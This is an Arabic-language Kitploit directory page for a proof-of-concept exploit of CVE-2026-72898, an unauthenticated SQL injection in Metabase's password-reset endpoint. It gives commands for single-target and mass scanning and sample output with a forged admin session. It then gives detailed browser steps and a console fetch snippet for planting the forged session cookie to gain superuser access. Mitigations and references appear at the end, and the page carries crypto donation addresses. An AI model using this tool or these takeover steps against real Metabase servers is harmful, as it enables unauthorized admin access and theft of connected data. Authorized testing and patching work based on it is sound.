Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-72898 — استغلال إثبات المفهوم لثغرة CVE-2026-72898، وهي حقن SQL غير مصادَق عليه في نقطة نهاية إعادة تعيين كلمة المرور في Metabase. يُزوّر جلسة مسؤول للاستيلاء الكامل، مع وضعَي الاستهداف الفردي والمسح الشامل للاختبارات المصرّح بها. | Kitploit
أدوات/GitHubGitHub/4minx/cve-2026-72898
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHub4minx/cve-2026-72898

CVE-2026-72898

استغلال إثبات المفهوم لثغرة CVE-2026-72898، وهي حقن SQL غير مصادَق عليه في نقطة نهاية إعادة تعيين كلمة المرور في Metabase. يُزوّر جلسة مسؤول للاستيلاء الكامل، مع وضعَي الاستهداف الفردي والمسح الشامل للاختبارات المصرّح بها.

عرض المستودع
1منذ 5 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-72898 PoC : ثغرة حقن SQL بدون مصادقة في Metabase

حقن SQL ما قبل المصادقة في Metabase يؤدي إلى الاستيلاء على حساب المسؤول

هذا إثبات مفهوم (PoC) للثغرة CVE-2026-72898، وهي ثغرة حقن SQL حرجة بدون مصادقة في نقطة إعادة تعيين كلمة المرور الخاصة بـ Metabase. يحقن الـ PoC صفّ جلسة مسؤول مزوّرة في جدول core_session، ثم يستخدم تلك الجلسة للتحقق من صحة جلسة مسؤول كاملة دون أي بيانات اعتماد.

ملاحظة: هذا الـ PoC مخصّص لاختبارات الاختراق المصرّح بها ولأغراض البحث فقط. الثغرة CVE-2026-72898 مُدرجة في كتالوج CISA للثغرات المستغلة المعروفة (KEV) ويتم استغلالها بنشاط في البرية. أنت مسؤول عن الامتثال لجميع القوانين المعمول بها والحصول على إذن كتابي قبل اختبار أي نظام.


معلومات الثغرة

  • CVE: CVE-2026-72898
  • النوع: CWE-89 تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL ('حقن SQL')
  • CVSS 4.0: 10.0 (حرجة)
  • المصادقة: بدون مصادقة (قبل المصادقة، عن بُعد، تعقيد هجوم منخفض)
  • CISA KEV: أُضيفت 2026-08-11 (استغلال نشط)
  • الإصدارات المتأثرة (Metabase):
    • x.58.0 إلى < x.58.24
    • x.59.0 إلى < x.59.21
    • x.60.0 إلى < x.60.17
    • x.61.0 إلى < x.61.11
    • x.62.0 إلى < x.62.9
    • x.63.0 إلى < x.63.5
  • أُصلحت في: x.58.24, x.59.21, x.60.17, x.61.11, x.62.9, x.63.5

المتطلبات

  • Python 3.8+ مع مكتبة requests
  • الهدف: نسخة Metabase متأثرة ومعرّضة للإنترنت

ثبّت التبعيات:

root@kitploit:~
pip install requests

الاستخدام

هدف واحد

root@kitploit:~
python cve-2026-72898_poc.py -t http://192.168.1.1:3000

فحص جماعي

root@kitploit:~
python cve-2026-72898_poc.py -T targets.txt

الخيارات


مثال على المخرجات

root@kitploit:~
 CVE-2026-72898 | Metabase SQLi PoC
----------------------------------------

Target: http://192.168.1.1:3000
 [1] GET http://192.168.1.1:3000/ -> 200
 [2] POST /api/session/reset_password -> 400
      (expected: Invalid reset token, SQLi executed)
 [3] GET /api/user/current -> 200
[+] VULNERABLE
    session id : 242x6a6cx-5388-aaf8-bl5c-afi46ic02198
    key_hashed : 0f6005cbexf08948c08dd9272b439xfecwabxb4ntedd83bagb6337bx849b6xyi6
    admin email: [email protected]

يُتوقع ظهور 400 في الخطوة 2 مع Invalid reset token — فهذا يعني أن حمولة SQLi نُفذت وأن الاستجابة قُطعت. وعودة الخطوة 3 برمز 200 على /api/user/current تؤكد أن الجلسة المزوّرة صالحة.

حالات النتائج: vulnerable | not_vulnerable | patched | root_not_200 | unknown | error


استخدام الجلسة المزوّرة

root@kitploit:~

يقرأ Metabase جلسته من ملف تعريف الارتباط `metabase.SESSION`، لذا يمكنك تسجيل الدخول إلى واجهة الويب كمسؤول مزوّر بإضافة ملف تعريف الارتباط هذا:

**Google Chrome / Edge / Chromium**

1. شغّل الـ PoC وانسخ `session id` المطبوعة
2. افتح `http://TARGET/` واضغط `F12` (أدوات المطوّر)
3. انتقل إلى **Application** (في Edge: **Application**؛ في Chrome: **Application**) &rarr; **Storage** &rarr; **Cookies** &rarr; وحدّد المضيف الهدف
4. انقر على زر **+** (Add cookie) واملأ الحقول:
   - **الاسم**: `metabase.SESSION`
   - **القيمة**: `<SESSION_ID>` (القيمة التي طبعها الـ PoC)
   - **النطاق**: مضيف الهدف/عنوان IP الخاص به (مثل `192.168.1.1` أو `.example.com`)
   - **المسار**: `/`
   - اضبط تاريخ انتهاء صلاحية بعيدًا في المستقبل (أو انقر على "Session")
5. انقر على **Save** ثم حدّث الصفحة
6. أنت الآن مصادَق عليه بصلاحيات المستخدم الفائق &mdash; ستظهر أيقونة الترس الخاصة بالمسؤول

**Firefox**

1. شغّل الـ PoC وانسخ `session id` المطبوعة
2. اضغط `F12` &rarr; تبويب **Storage** &rarr; **Cookies** &rarr; وحدّد المضيف الهدف
3. انقر بزر الفأرة الأيمن &rarr; **Add/Edit Cookie** وأضف:
   - **الاسم**: `metabase.SESSION`
   - **القيمة**: `<SESSION_ID>`
   - **المسار**: `/`
   - **HttpOnly**: بدون تحديد (تقوم JavaScript بتعيينه)
   - **Secure**: بدون تحديد لاتصال HTTP العادي
4. احفظ وحدّث الصفحة

**بديل: إضافة محرّر ملفات تعريف الارتباط**

استخدم أي إضافة لتحرير ملفات تعريف الارتباط (مثل Cookie-Editor) لإضافة ملف تعريف الارتباط `metabase.SESSION` بالقيمة المزوّرة على النطاق الهدف، ثم حدّث الصفحة.

**من وحدة تحكم المتصفح**

```js
fetch('/api/user/current', { headers: { 'X-Metabase-Session': '<SESSION_ID>' } })
  .then(r => r.json()).then(console.log)

إجراءات التخفيف

  • قم بالترقية إلى إصدار مصحح (x.58.24 / x.59.21 / x.60.17 / x.61.11 / x.62.9 / x.63.5 أو أحدث)
  • إذا لم تتمكن من الترقية فورًا، احجب /api/session/reset_password على مستوى الشبكة/جدار حماية التطبيقات (WAF)
  • بعد الترقية: ألغِ جميع الجلسات النشطة، وغيّر بيانات اعتماد قواعد البيانات المتصلة، وراجع حسابات المسؤولين ومفاتيح API بحثًا عن أي تغييرات غير متوقعة، ودقّق سجل نشاطات واستعلامات Metabase

☕ الدعم

إذا كان هذا المشروع مفيدًا لك، ففكّر في دعم تطويره:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

المراجع

  • نشرة Metabase الأمنية (GHSA-vwf4-m7j8-wcjf)
  • التحديث الأمني من Metabase
  • سجل CVE.org – CVE-2026-72898
  • NVD – CVE-2026-72898
  • كتالوج CISA للثغرات المستغلة المعروفة
  • Horizon3.ai – حقن SQL في Metabase
  • The Hacker News – ثغرة يوم الصفر في Metabase مستغلة في البرية
  • قالب Nuclei – حقن SQL بدون مصادقة في Metabase
تنزيل الأداة
الوسيطالوصفالافتراضي
-t, --targetرابط الهدف الواحد-
-T, --targetsملف يحتوي على روابط الأهداف، رابط واحد في كل سطر-
-o, --outputملف النتائج (مفصول بعلامة تبويب: target, result, status, session_id, admin_email)-
--timeoutمهلة الطلب بالثواني15